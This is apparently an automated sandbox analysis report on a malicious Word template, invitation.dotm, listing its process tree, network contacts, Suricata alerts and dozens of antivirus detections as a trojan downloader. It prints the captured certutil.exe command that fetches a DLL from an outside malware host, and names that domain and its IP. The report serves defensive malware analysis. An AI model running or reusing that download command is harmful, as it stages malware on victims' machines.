Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 6, 2021, 1:59 p.m. | Aug. 6, 2021, 2:02 p.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\invitation.dotm
1016-
certutil.exe certutil.exe -urlcache -split -f https://donattelli.com/test/ssi/1.dll C:\Users\test22\AppData\Local\Temp\radA044B.tmp.dll
1536
-
Name | Response | Post-Analysis Lookup |
---|---|---|
donattelli.com | 185.92.244.225 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49207 -> 185.92.244.225:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49203 -> 185.92.244.225:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 185.92.244.225:443 -> 192.168.56.101:49204 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 185.92.244.225:443 -> 192.168.56.101:49208 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.101:49206 -> 185.92.244.225:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\~$vitation.dotm |
com_class | Scripting.FileSystemObject | May attempt to write one or more files to the harddisk |
parent_process | winword.exe | martian_process | certutil.exe -urlcache -split -f https://donattelli.com/test/ssi/1.dll C:\Users\test22\AppData\Local\Temp\radA044B.tmp.dll |
Lionic | Trojan.MSWord.Caccf.4!c |
Elastic | malicious (high confidence) |
MicroWorld-eScan | VB.Heur.EmoooDldr.1.02CACCF2.Gen |
McAfee | RDN/Generic Downloader.x |
Sangfor | Malware.Generic-VBS.Save.481bf0ab |
Alibaba | TrojanDownloader:VBA/MalDoc.ali1000101 |
Arcabit | VB.Heur.EmoooDldr.1.02CACCF2.Gen |
Cyren | PP97M/Agent.QA.gen!Eldorado |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | VBA/Obfuscated.C |
Avast | Script:SNH-gen [Trj] |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | VB.Heur.EmoooDldr.1.02CACCF2.Gen |
NANO-Antivirus | Trojan.Ole2.Vbs-heuristic.druvzi |
Ad-Aware | VB.Heur.EmoooDldr.1.02CACCF2.Gen |
TACHYON | Suspicious/WOX.Obfus.Gen.8 |
Emsisoft | VB.Heur.EmoooDldr.1.02CACCF2.Gen (B) |
F-Secure | Heuristic.HEUR/Macro.Downloader.AMGY.Gen |
TrendMicro | HEUR_VBA.O2 |
McAfee-GW-Edition | BehavesLike.Downloader.mc |
FireEye | VB.Heur.EmoooDldr.1.02CACCF2.Gen |
SentinelOne | Static AI - Malicious OPENXML |
GData | VB.Heur.EmoooDldr.1.02CACCF2.Gen |
Avira | HEUR/Macro.Downloader.AMGY.Gen |
Microsoft | TrojanDownloader:O97M/Obfuse.SM!MTB |
ViRobot | DOC.Z.Agent.28453 |
Cynet | Malicious (score: 99) |
AhnLab-V3 | Downloader/DOC.Agent |
MAX | malware (ai score=100) |
Zoner | Probably Heur.W97Obfuscated |
Tencent | Heur.Macro.Generic.h.2d815c04 |
Ikarus | Trojan.VBA.Obfuscated |
Fortinet | VBA/Agent.3FB2!tr.dldr |
AVG | Script:SNH-gen [Trj] |
Qihoo-360 | virus.office.obfuscated.1 |